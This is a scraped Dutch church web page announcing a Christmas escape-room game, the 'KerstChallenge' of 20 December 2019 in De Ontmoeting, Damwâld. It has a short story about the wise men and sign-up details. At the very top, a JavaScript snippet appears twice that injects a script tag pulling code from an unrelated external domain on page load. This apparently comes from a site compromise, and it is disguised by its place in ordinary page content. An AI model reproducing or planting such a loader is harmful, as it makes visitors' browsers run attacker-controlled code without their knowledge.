;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerstchallenge 20 december 2019 - 19: 45 uur in De Ontmoeting - PKN Damwâld

Kerstchallenge 20 december 2019 – 19: 45 uur in De Ontmoeting

Gepubliceerd op: donderdag 28 november 2019

De KerstChallenge 2019 is een escaperoom-achtig spel van een uur. In de donkere dagen voor Kerst kruip je in de huid van een wijze uit het oosten. Door puzzels op te lossen probeer je te ontdekken waar de ster jou heen leidt!

De nacht was lang en koud. Je hebt urenlang naar de hemel staan staren op zoek naar een teken uit de hemel. Maar niets. Geen komeet of een nieuwe ster te zien. Samen met je twee vrienden kijk je naar de sterren omdat ze je vertellen wanneer er een nieuwe koning geboren zal worden. En dat is nodig ook. Je leeft in een tijd met verschrikkelijke koningen en keizers. Ze voeren oorlogen, maken alle mensen tot slaven die in armoede moeten leven. En daarom hoop je dat de hemel in zal grijpen. Of een God die daar woont. Maar deze nacht komt er geen teken van boven. Je sluit de deur van het dakterras achter je en werpt nog een blik naar buiten. En dan zie je opeens iets dat je nog nooit hebt gezien….Meedoen? Geef je dan op!

Opgave vóór zaterdag 14 december bij:
Tineke Banga 06 – 30 68 74 26
of via jo.damwald@gmail.com

Graag onder vermelding van naam, leeftijd en telefoonnummer.